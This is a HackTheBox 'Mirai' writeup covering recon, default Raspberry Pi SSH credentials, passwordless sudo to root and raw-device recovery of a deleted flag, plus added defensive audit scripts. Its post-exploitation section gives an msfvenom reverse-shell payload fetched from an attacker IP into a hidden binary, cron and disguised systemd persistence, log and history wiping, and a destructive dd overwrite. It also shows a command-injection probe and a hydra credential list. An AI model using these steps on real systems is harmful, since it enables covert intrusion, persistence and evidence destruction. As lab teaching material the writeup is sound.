
HackTheBox Mirai

Writeup for HackTheBox Mirai


Machine Synopsis

Key Exploitation Techniques:

  • Default SSH credentials on an IoT device (Raspberry Pi, pi:raspberry)
  • Sudo misconfiguration (NOPASSWD: ALL) giving immediate root
  • Locating the mounted USB stick with df and recovering an unlinked file from the raw block device with strings
  • USB device analysis: reading unallocated blocks from the device node rather than the mounted filesystem

Reconnaissance & Enumeration

Port Discovery

$ nmap -sC -sV -A 10.10.10.48
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35

IoT Device Identification

Key Indicators:

  • dnsmasq on 53/tcp (a small resolver/DHCP daemon common on routers and IoT devices)
  • lighttpd web server (a low-footprint HTTP server favoured on embedded systems)
  • OpenSSH 6.7p1 Debian 5+deb8u3 is the Debian 8 (Jessie) package, the release Raspbian Jessie was built from

Web Application Analysis

# Add hostname to resolve web interface
$ echo "10.10.10.48 mirai.htb" >> /etc/hosts

# Directory enumeration
$ dirsearch -u http://mirai.htb -w /usr/share/dirb/wordlists/common.txt
[21:05:29] 301 -   0B  - /admin  ->  http://mirai.htb/admin/

Accessing /admin reveals a Raspberry Pi dashboard/control interface, confirming IoT device identification.

Exploitation


Default Credential Testing

IoT devices, particularly Raspberry Pi systems, often retain default credentials:

Common Raspberry Pi defaults and guesses:

  • pi:raspberry (the stock Raspbian account until the default user was dropped in 2022)
  • pi:pi
  • admin:admin
# Test default SSH credentials (the password is typed at the prompt; ssh does not echo it)
$ ssh pi@10.10.10.48
pi@10.10.10.48's password: raspberry

pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.4.50+ #970 Mon Feb 20 19:18:29 GMT 2017 armv6l GNU/Linux

Success: Default credentials pi:raspberry provide immediate SSH access.

User Flag Retrieval

pi@raspberrypi:~ $ ls
background.jpg  Documents  Music        Pictures  python_games  Videos
Desktop         Downloads  oldconffiles  Public    Templates

pi@raspberrypi:~ $ cat Desktop/user.txt
ff837707441b257a20e32199d7c8838d

Privilege Escalation

Sudo Enumeration

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Critical Misconfiguration: User pi has unrestricted sudo access without a password. Two entries match; sudo applies the last matching entry, so the NOPASSWD line wins and every command runs with no prompt. Even without it, the first entry would only have asked for pi's own password, which is already known (raspberry).
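As an added example (not part of the original writeup), the check below evaluates a sudoers file the way sudo does: it parses User_Spec lines, applies the last-match rule to the entries for a user, and flags an effective NOPASSWD: ALL. The sudoers text is constructed from the two entries sudo -l reported for pi; the parser handles only plain User_Spec lines (no aliases, includes or Defaults), an assumption made to keep it short, so anything it cannot parse should be reviewed by hand, e.g. with visudo -c.

```python
"""Audit sudoers User_Spec entries the way sudo applies them.

Added example, not part of the writeup. Handles plain entries such as
    pi  ALL=(ALL:ALL) ALL
    pi  ALL=(ALL) NOPASSWD: ALL
and reproduces sudo's rule that when several entries match, the LAST one
decides. Aliases, #include(dir) and Defaults lines are not handled (an
assumption to keep the example short); anything skipped here should be
reviewed by hand, e.g. with `visudo -c -f <file>`.
"""
import re
from dataclasses import dataclass

# Constructed sample: what /etc/sudoers would contain to produce the
# `sudo -l` output shown for pi.
SAMPLE_SUDOERS = """\
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
pi      ALL=(ALL:ALL) ALL
pi      ALL=(ALL) NOPASSWD: ALL
"""

SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"                 # user host =
    r"(?:\((?P<runas>[^)]*)\)\s*)?"                           # optional (runas)
    r"(?P<tags>(?:(?:NOPASSWD|PASSWD|NOEXEC|SETENV):\s*)*)"   # tag list
    r"(?P<cmds>.+)$"                                          # command list
)


@dataclass
class Spec:
    user: str        # "pi", "%sudo" (a group) or "ALL"
    host: str
    runas: str
    nopasswd: bool
    cmds: str        # "ALL" or a comma-separated command list


def parse_sudoers(text):
    """Return User_Spec entries in file order; order is what sudo goes by."""
    specs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue        # alias definitions etc. are not handled here
        specs.append(Spec(user=m.group("user"), host=m.group("host"),
                          runas=m.group("runas") or "root",
                          nopasswd="NOPASSWD:" in m.group("tags"),
                          cmds=m.group("cmds").strip()))
    return specs


def _applies_to(spec, user, groups, host):
    user_ok = spec.user in ("ALL", user) or (
        spec.user.startswith("%") and spec.user[1:] in groups)
    return user_ok and spec.host in ("ALL", host)


def _covers(spec, command):
    return spec.cmds == "ALL" or command in [c.strip() for c in spec.cmds.split(",")]


def effective_entry(specs, user, command="ALL", groups=(), host="ALL"):
    """The entry sudo would apply for `command`: the last match wins, not
    the first and not the most specific."""
    hit = None
    for spec in specs:
        if _applies_to(spec, user, groups, host) and _covers(spec, command):
            hit = spec
    return hit


def audit(text, user, groups=(), host="ALL"):
    """Human-readable findings about `user`'s effective sudo rights."""
    specs = parse_sudoers(text)
    findings = []
    entry = effective_entry(specs, user, "ALL", groups, host)
    if entry is not None:
        if entry.nopasswd:
            findings.append(f"{user}: unrestricted passwordless sudo (ALL) as ({entry.runas})")
        else:
            findings.append(f"{user}: unrestricted sudo (ALL), password required")
    for spec in specs:   # command-limited NOPASSWD entries are worth listing too
        if spec.cmds != "ALL" and spec.nopasswd and _applies_to(spec, user, groups, host):
            findings.append(f"{user}: passwordless sudo for {spec.cmds}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDOERS, "pi") or ["pi: nothing flagged"]:
        print(finding)
```

Swapping the order of pi's two lines in the sample changes the verdict to "password required", which is the point: what matters is not whether a NOPASSWD line exists but which entry sudo reaches last. Run it as root against /etc/sudoers and each file in /etc/sudoers.d on a box you are auditing.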

Root Access

pi@raspberrypi:~ $ sudo bash
root@raspberrypi:/home/pi# whoami
root
root@raspberrypi:/home/pi# id
uid=0(root) gid=0(root) groups=0(root)

Root Flag Investigation

root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Challenge: Original root flag has been deleted, backup exists on USB device.

Digital Forensics & Data Recovery

File System Analysis

# List mounted filesystems
root@raspberrypi:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/root        1.3G  1.1G  143M  89% /
devtmpfs        483M     0  483M   0% /dev
tmpfs           487M     0  487M   0% /dev/shm
tmpfs           487M   13M  475M   3% /run
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           487M     0  487M   0% /sys/fs/cgroup
/dev/mmcblk0p1   41M   21M   19M  53% /boot
/dev/sdb          8.7M   93K  7.9M   2% /media/usbstick

Key Finding: USB stick mounted at /media/usbstick from the whole device /dev/sdb (no partition table), so /dev/sdb is the node to read raw if anything was deleted.

USB Device Investigation

root@raspberrypi:/# cd /media/usbstick
root@raspberrypi:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found

root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Data Recovery using strings

# Read the raw block device rather than the mounted filesystem: unlinking a
# file on an ext2/3/4 volume only frees its inode and directory entry, so the
# data blocks stay on the device until something overwrites them
root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

Data Recovery Success: Root flag recovered: 3d3e483143ff12ec505d026fa13e020b

The directory names (root.txt, damnit.txt) and the note from damnit.txt show up next to the flag because strings prints every run of four or more printable characters on the device. On a larger volume pipe it through grep -E '^[0-9a-f]{32}$' rather than reading by eye, and image the stick first (dd if=/dev/sdb of=usb.img) and run strings on the copy so the evidence is not touched again.

Post-Exploitation Techniques

Persistence Methods

SSH Key Persistence

# Generate SSH key pair on the attacking host
$ ssh-keygen -t rsa -b 4096 -f mirai_persistence

# Install as pi user (0700 on .ssh and 0600 on authorized_keys satisfy sshd's StrictModes check)
# mkdir -p /home/pi/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /home/pi/.ssh/authorized_keys
# chmod 700 /home/pi/.ssh
# chmod 600 /home/pi/.ssh/authorized_keys
# chown -R pi:pi /home/pi/.ssh

# Install as root (only useful if PermitRootLogin in /etc/ssh/sshd_config is not "no")
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 700 /root/.ssh
# chmod 600 /root/.ssh/authorized_keys

Cron Backdoor

# Create reverse shell payload (the target is armv6l, so an ARM little-endian ELF)
$ msfvenom -p linux/armle/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f elf -o backdoor

# Install persistent cron job. /etc/crontab is the system crontab: it needs the
# user field between the schedule and the command, otherwise the line is
# parsed wrongly and never runs
# wget http://10.10.14.6/backdoor -O /usr/bin/.system-update
# chmod +x /usr/bin/.system-update
# echo "*/15 * * * * root /usr/bin/.system-update" >> /etc/crontab

Service Installation

# Create systemd service for persistence; Restart=always re-launches the
# reverse shell a minute after it exits, so a dropped connection comes back
# cat > /etc/systemd/system/system-monitor.service << 'EOF'
[Unit]
Description=System Monitor Service
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/.system-update
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target
EOF

# Register and start the unit (daemon-reload makes systemd pick up the new file)
# systemctl daemon-reload
# systemctl enable system-monitor.service
# systemctl start system-monitor.service
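Detection counterpart, added here and not from the writeup: a small audit that parses system-crontab lines and systemd unit files and flags the traits the cron and systemd mechanisms above share (an executable whose basename starts with a dot, an executable under /tmp, /var/tmp or /dev/shm, and a system-crontab line that lacks the user field). The sample crontab and unit text are constructed; the unit-file check reads only ExecStart=, an assumption made to keep it short.

```python
"""Flag cron and systemd persistence of the kind installed above.

Added example, not from the writeup. Two small parsers: one for the
system-crontab format (/etc/crontab and /etc/cron.d/*: five time fields,
a user, then the command) and one for systemd unit files (ExecStart=
only, an assumption to keep it short). Both hand the executable to one
classifier that flags dot-file names and world-writable temp directories.
The sample inputs are constructed from the cron line and unit file above.
"""
import os
import shlex

SUSPICIOUS_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Constructed sample: one line with the user field missing, one with it.
SAMPLE_CRONTAB = """\
# /etc/crontab: constructed sample
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/15 * * * * /usr/bin/.system-update
*/15 * * * * root /usr/bin/.system-update
@reboot root /dev/shm/x -p 4444
"""

# Constructed sample: the unit file from the section above.
SAMPLE_UNIT = """\
[Unit]
Description=System Monitor Service
After=network.target

[Service]
Type=simple
ExecStart=/usr/bin/.system-update
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target
"""


def suspicious_path(path):
    """Reason an executable path is worth a look, or None."""
    if os.path.basename(path).startswith("."):
        return "hidden dot-file executable"
    if any(path == d or path.startswith(d + "/") for d in SUSPICIOUS_DIRS):
        return "executable in world-writable temp directory"
    return None


def _first_word(command):
    try:
        argv = shlex.split(command)
    except ValueError:          # unbalanced quotes: fall back to a plain split
        argv = command.split()
    return argv[0] if argv else ""


def audit_system_crontab(text):
    """Return (line_no, reason, line) for each suspect system-crontab line.
    User crontabs (crontab -l) have no user field and need a different parser."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:                       # SHELL=..., PATH=..., MAILTO=...
            continue
        if first.startswith("@"):              # @reboot, @daily, ...
            fields = line.split(None, 2)
            user, command = (fields[1], fields[2]) if len(fields) == 3 else (None, None)
        else:
            fields = line.split(None, 6)
            user, command = (fields[5], fields[6]) if len(fields) == 7 else (None, None)
        if user is None:
            findings.append((line_no, "malformed system crontab entry (missing user field?)", line))
            continue
        reason = suspicious_path(_first_word(command))
        if reason:
            findings.append((line_no, f"{reason} run as {user}", line))
    return findings


def audit_unit(text, name):
    """Return (unit, reason, exe) for each suspect ExecStart= in a unit file."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("ExecStart="):
            continue
        command = line.split("=", 1)[1].lstrip("-@:+!")   # strip systemd exec prefixes
        exe = _first_word(command)
        reason = suspicious_path(exe)
        if reason:
            findings.append((name, reason, exe))
    return findings


if __name__ == "__main__":
    for f in audit_system_crontab(SAMPLE_CRONTAB) + audit_unit(SAMPLE_UNIT, "system-monitor.service"):
        print(f)
```

On a live box feed it /etc/crontab, every file under /etc/cron.d, and each unit under /etc/systemd/system; a unit created outside the package manager (no owning package in dpkg -S) plus a dot-file ExecStart is the combination the service above produces.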

Defense Evasion

Log Sanitization

# Clear system logs (truncating with > keeps the inode and permissions, so
# rsyslog keeps writing without a restart; note that a zero-length auth.log is
# itself an indicator: this hides content, not the fact of tampering)
# > /var/log/auth.log
# > /var/log/syslog
# > /var/log/messages
# > /var/log/wtmp
# > /var/log/lastlog

# Clear command histories; bash writes its history on exit, so also stop the
# current session from re-creating the file
# unset HISTFILE
# history -c
# > /root/.bash_history
# > /home/pi/.bash_history

# Clear DNS query logs, if dnsmasq is configured with log-queries
# > /var/log/dnsmasq.log

Configuration Hardening (Anti-Forensics)

# Stop usb_storage loading at the next boot (the module already loaded stays
# loaded until rmmod or a reboot)
# echo "blacklist usb_storage" >> /etc/modprobe.d/blacklist.conf

# Overwrite the stick so the deleted data can no longer be carved. This
# destroys the filesystem and the only copy of the flag, and on a shared lab
# box ruins it for everyone else: unmount first and only do it on your own
# instance
# umount /media/usbstick
# dd if=/dev/urandom of=/dev/sdb bs=1M count=10

IoT-Specific Reconnaissance

Hardware Information

# Raspberry Pi model identification
# grep -E "(Hardware|Revision|Model)" /proc/cpuinfo
Hardware        : BCM2835
Revision        : a02082
Model           : Raspberry Pi 3 Model B Rev 1.2
# (illustrative output: revision a02082 is a Pi 3 Model B, but the uname line
#  earlier shows the armv6l "4.4.50+" kernel, which is the Pi 1/Zero build; a
#  Pi 3 on 32-bit Raspbian reports armv7l and a "-v7+" kernel)

# GPIO pin status (needs debugfs mounted: mount -t debugfs none /sys/kernel/debug)
# cat /sys/kernel/debug/gpio

# SoC temperature
# /opt/vc/bin/vcgencmd measure_temp
temp=42.8'C

Network Interface Analysis

# Wireless interface enumeration
# iwconfig
# iw dev

# Bluetooth devices
# hciconfig
# bluetoothctl list

IoT Service Discovery

# Check for IoT-specific services
# systemctl list-units | grep -E "(gpio|i2c|spi|uart)"

# Examine boot configuration (overlays, enabled buses, serial console)
# grep -v "^#" /boot/config.txt

# Check for camera module
# /opt/vc/bin/vcgencmd get_camera

Alternative Exploitation Methods

Web Interface Exploitation

# If an admin panel is reachable, test for:
# - Default web credentials (admin:admin, admin:password)
# - Command injection in configuration forms
# - File upload vulnerabilities
#
# Illustrative probe only: /admin/config.php and the "command" parameter are
# placeholders for whatever the real form posts; no such injection is
# demonstrated on this box. Capture the genuine request in a proxy and
# substitute its path and field names.
$ curl -X POST http://mirai.htb/admin/config.php \
  -d "command=; id; #"

Brute Force Alternative Credentials

# Common IoT credential combinations
$ cat > iot_creds.txt << 'EOF'
pi:raspberry
pi:pi
admin:admin
admin:password
root:raspberry
root:root
user:user
EOF

# Automated SSH brute force (-C reads login:password pairs, one per line;
# keep -t low: sshd caps unauthenticated connections and every failure lands in auth.log)
$ hydra -C iot_creds.txt ssh://10.10.10.48 -t 4

USB Forensics Alternative Methods

# Alternative data recovery tools
# photorec /dev/sdb    # interactive (ncurses) signature-based file carver
# testdisk /dev/sdb    # partition table / filesystem recovery
# grep -a -o -E '[0-9a-f]{32}' /dev/sdb     # binary-safe grep straight off the raw device
# xxd /dev/sdb | grep -A5 -B5 "root.txt"   # hexdump around the directory entry

# File carving with scalpel (carves by configured file signatures)
# scalpel -b -o recovery_output /dev/sdb

# Caveat: photorec and scalpel find files by magic headers/footers; a plain
# text flag file has neither, so strings or grep on the raw device is the
# right tool here. Image the stick first (dd if=/dev/sdb of=usb.img) and
# carve the image, not the live device.
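The following is an added example (not code from the writeup) that covers both the strings /dev/sdb recovery earlier and the grep/xxd alternatives listed here: a carver that reads a block device or image in fixed-size chunks with an overlap, so a 32-hex-character token that straddles a chunk boundary is still found exactly once and reported with its byte offset, while a longer hex run (a SHA-1, say) is not misreported as a flag. The sample image it builds is constructed to mimic what strings showed on the stick; the flag value is the one recovered above, and the assumed workflow is running it against a dd image of /dev/sdb rather than the live device.

```python
"""Carve 32-hex-character tokens (the HTB flag format) out of a raw block
device or disk image, chunk by chunk.

Added example, not from the writeup. Reads the device in fixed-size chunks
with an overlap so that a hit straddling a chunk boundary is neither missed
nor reported twice, and records the byte offset of each hit so the evidence
can be cited. Assumption: the stick has been imaged first
(dd if=/dev/sdb of=usb.img) and the image, not the live device, is carved.
"""
import os
import re
import sys
import tempfile

# 32 lowercase hex chars that are NOT part of a longer hex run: a SHA-1 or
# SHA-256 lying in free space must not be cut down to a 32-char "flag".
FLAG_RE = re.compile(rb"(?<![0-9a-fA-F])[0-9a-f]{32}(?![0-9a-fA-F])")

# The value recovered from /dev/sdb above, reused as sample data.
FLAG = b"3d3e483143ff12ec505d026fa13e020b"


def carve(path, pattern=FLAG_RE, chunk_size=1 << 20, overlap=64):
    """Return [(offset, token), ...] for every pattern hit in the file.

    `overlap` must exceed the longest possible match plus one byte of
    look-around context on each side; 64 is plenty for a 32-byte token.
    chunk_size should be much larger than overlap.
    """
    hits, seen = [], set()
    with open(path, "rb") as fh:
        base = 0            # absolute offset of `data` within the device
        tail = b""          # last `overlap` bytes of the previous buffer
        data = fh.read(chunk_size)
        while data:
            nxt = fh.read(chunk_size)      # read ahead so EOF is known now
            eof = not nxt
            buf = tail + data
            buf_base = base - len(tail)
            for m in pattern.finditer(buf):
                # A match touching a buffer edge lacks real context on that
                # side; it is re-examined from the adjacent buffer instead.
                if m.start() == 0 and buf_base != 0:
                    continue
                if m.end() == len(buf) and not eof:
                    continue
                off = buf_base + m.start()
                if off not in seen:        # same hit visible from two buffers
                    seen.add(off)
                    hits.append((off, m.group(0)))
            tail = buf[-overlap:]
            base += len(data)
            data = nxt
    return hits


def build_sample_image(path, chunk_size=4096):
    """Write a constructed stand-in for /dev/sdb: filesystem-looking strings,
    a decoy token sitting wholly inside the overlap window (seen from two
    buffers, must be reported once), the flag placed so it straddles the
    chunk boundary, the note from damnit.txt, and a 40-hex SHA-1-looking run
    that must not be reported. Returns the offsets of decoy and flag."""
    img = bytearray(b"\x00" * 1024)
    img += b"/media/usbstick\x00lost+found\x00root.txt\x00damnit.txt\x00"

    def pad_to(n):
        img.extend(b"\x00" * (n - len(img)))

    pad_to(chunk_size - 56)
    decoy_off = len(img)
    img += b"deadbeef" * 4                  # 32 hex chars, ends before the boundary
    pad_to(chunk_size - 10)
    flag_off = len(img)
    img += FLAG + b"\n"                     # 10 bytes before / 22 after the boundary
    img += (b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
            b"Do you know if there is any way to get them back?\n\n-James\n")
    img += b"\x00" * 100 + b"da39a3ee5e6b4b0d3255bfef95601890afd80709" + b"\x00" * 100
    with open(path, "wb") as fh:
        fh.write(img)
    return decoy_off, flag_off


def demo(chunk_size=4096):
    """Build the constructed image in a temp dir, carve it with a small chunk
    size so the overlap path is exercised, and carve it again in one read.
    Returns (expected, chunked_hits, single_read_hits)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "usb.img")
        decoy_off, flag_off = build_sample_image(path, chunk_size)
        chunked = carve(path, chunk_size=chunk_size, overlap=64)
        whole = carve(path, chunk_size=1 << 20, overlap=64)
    return [(decoy_off, b"deadbeef" * 4), (flag_off, FLAG)], chunked, whole


if __name__ == "__main__":
    if len(sys.argv) > 1:                   # python3 carve.py usb.img
        for off, tok in carve(sys.argv[1]):
            print(f"0x{off:08x}  {tok.decode()}")
    else:
        expected, chunked, _ = demo()
        print("constructed image ok:", chunked == expected, chunked)
```

The offset is what makes a hit usable as evidence: with it you can go back to the image with xxd -s OFFSET and show the flag sitting in the unallocated block that once belonged to root.txt, instead of quoting a line from strings output with no location.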

Network Service Exploitation

# DNS service enumeration
$ dig @10.10.10.48 mirai.htb
$ nslookup mirai.htb 10.10.10.48

# HTTP service exploitation
$ nikto -h http://mirai.htb
$ dirb http://mirai.htb /usr/share/dirb/wordlists/common.txt

Hardware-Specific Attacks

# If physical access available:
# - SD card extraction and mounting
# - UART/Serial console access
# - GPIO manipulation for hardware backdoors
# - Boot process interruption

This post is licensed under CC BY 4.0 by the author.